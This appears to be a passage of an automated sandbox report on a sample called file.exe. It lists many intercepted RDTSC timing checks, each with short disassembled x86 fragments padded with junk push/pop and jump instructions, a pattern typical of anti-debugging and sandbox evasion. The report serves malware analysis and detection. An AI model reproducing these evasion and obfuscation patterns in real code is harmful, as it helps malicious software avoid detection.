                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C302C second address: 9C3048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A98h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3182 second address: 9C3187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3187 second address: 9C318D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C318D second address: 9C31BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAC5092E63h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31BE second address: 9C31C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31C2 second address: 9C31CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31CF second address: 9C31D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31D9 second address: 9C31DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31DF second address: 9C31E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31E3 second address: 9C31E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31E7 second address: 9C3207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAC5254A98h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3207 second address: 9C320B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9C3382 second address: 9C3392 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007FAAC5254A86h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CAFEF second address: 9CB015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E65h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007FAAC5092E56h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CB015 second address: 9CB02C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FAAC5254A8Eh 0x0000000f jng 00007FAAC5254A86h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CB1BD second address: 9CB1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CB1C3 second address: 9CB1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CB1C7 second address: 9CB1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CB1D0 second address: 9CB1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jne 00007FAAC5254A86h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CB305 second address: 9CB32D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E66h 0x00000007 jnp 00007FAAC5092E56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007FAAC5092E58h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CBA7A second address: 9CBA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D25F6 second address: 9D2610 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAC5092E5Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D2610 second address: 9D2618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D2618 second address: 9D2641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E64h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FAAC5092E5Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D2641 second address: 9D2657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jp 00007FAAC5254A94h 0x0000000d pushad 0x0000000e jng 00007FAAC5254A86h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D21E7 second address: 9D21F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D21F1 second address: 9D21F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D233B second address: 9D233F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D233F second address: 9D234F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DCF70 second address: 9DCF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DCF76 second address: 9DCFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FAAC5254A8Eh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jnp 00007FAAC5254A86h 0x0000001a popad 0x0000001b jmp 00007FAAC5254A8Ch 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DCFA6 second address: 9DCFB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Bh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DCFB8 second address: 9DCFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E04E4 second address: 9E04E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E2DDA second address: 9E2DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FAAC5254A8Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E6B63 second address: 9E6B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E6B67 second address: 9E6B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F4ACA second address: 9F4ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F4ACE second address: 9F4ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAAC5254A86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F4ADA second address: 9F4ADF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F6E02 second address: 9F6E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F8578 second address: 9F8586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FAAC5092E56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FAA11 second address: 9FAA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FFC74 second address: 9FFC79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A000A0 second address: A000A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A000A4 second address: A000AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A000AA second address: A000C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAC5254A94h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A000C2 second address: A000F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007FAAC5092E56h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pop ecx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A000F2 second address: A0012D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAAC5254AA3h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAAC5254A94h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A003FB second address: A003FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A003FF second address: A00418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007FAAC5254A86h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pushad 0x00000011 ja 00007FAAC5254A86h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A00552 second address: A00564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FAAC5092E5Ch 0x0000000c jnl 00007FAAC5092E56h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A00564 second address: A00569 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A00569 second address: A0056F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A006CF second address: A006D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A006D3 second address: A006E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A006E3 second address: A006E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A04CBA second address: A04CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A04CBE second address: A04CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FAAC5254A92h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAAC5254A94h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A04CED second address: A04CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A12D44 second address: A12D76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Eh 0x00000007 jmp 00007FAAC5254A97h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jg 00007FAAC5254A86h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A12C08 second address: A12C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0D32E second address: A0D339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FAAC5254A86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0D339 second address: A0D33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1FD44 second address: A1FD4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1FD4A second address: A1FD67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAC5092E68h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1FD67 second address: A1FD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1FD6D second address: A1FD71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2FACF second address: A2FAD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2FAD5 second address: A2FADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2FADB second address: A2FAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A8Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A302A8 second address: A302AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A302AE second address: A302E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FAAC5254A86h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e jmp 00007FAAC5254A94h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jc 00007FAAC5254AA0h 0x0000001b push eax 0x0000001c push edx 0x0000001d jo 00007FAAC5254A86h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A308F7 second address: A308FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A321B4 second address: A321CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A92h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A321CF second address: A321D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A321D3 second address: A321DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007FAAC5254A86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A37E94 second address: A37EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAC5092E62h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A37EAA second address: A37F40 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FAAC5254A88h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push 00000004h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FAAC5254A88h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 jmp 00007FAAC5254A8Ah 0x00000048 call 00007FAAC5254A89h 0x0000004d push eax 0x0000004e jnc 00007FAAC5254A8Ch 0x00000054 pop eax 0x00000055 push eax 0x00000056 jnc 00007FAAC5254A92h 0x0000005c mov eax, dword ptr [esp+04h] 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FAAC5254A8Eh 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A38188 second address: A381B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 and edx, 4645EC73h 0x0000000f push dword ptr [ebp+122D1DEBh] 0x00000015 mov dh, 30h 0x00000017 call 00007FAAC5092E59h 0x0000001c jng 00007FAAC5092E68h 0x00000022 push eax 0x00000023 push edx 0x00000024 jnl 00007FAAC5092E56h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A381B6 second address: A381BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A381BA second address: A381D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAAC5092E5Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A381D2 second address: A381D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A381D7 second address: A381E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A3B6EF second address: A3B6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A3B6F5 second address: A3B6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0336 second address: 4DA033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA033C second address: 4DA0340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0340 second address: 4DA0375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAC5254A95h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA03A1 second address: 4DA0404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, C4h 0x0000000d pushfd 0x0000000e jmp 00007FAAC5092E69h 0x00000013 add si, 63F6h 0x00000018 jmp 00007FAAC5092E61h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FAAC5092E63h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0404 second address: 4DA0421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0421 second address: 4DA045F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAC5092E63h 0x00000009 or ch, 0000003Eh 0x0000000c jmp 00007FAAC5092E69h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA045F second address: 4DA0472 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0472 second address: 4DA049B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, dx 0x00000011 mov ax, di 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA049B second address: 4DA04DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FAAC5254A8Ch 0x0000000b xor eax, 6D3730F8h 0x00000011 jmp 00007FAAC5254A8Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAAC5254A95h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA04DA second address: 4DA04E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
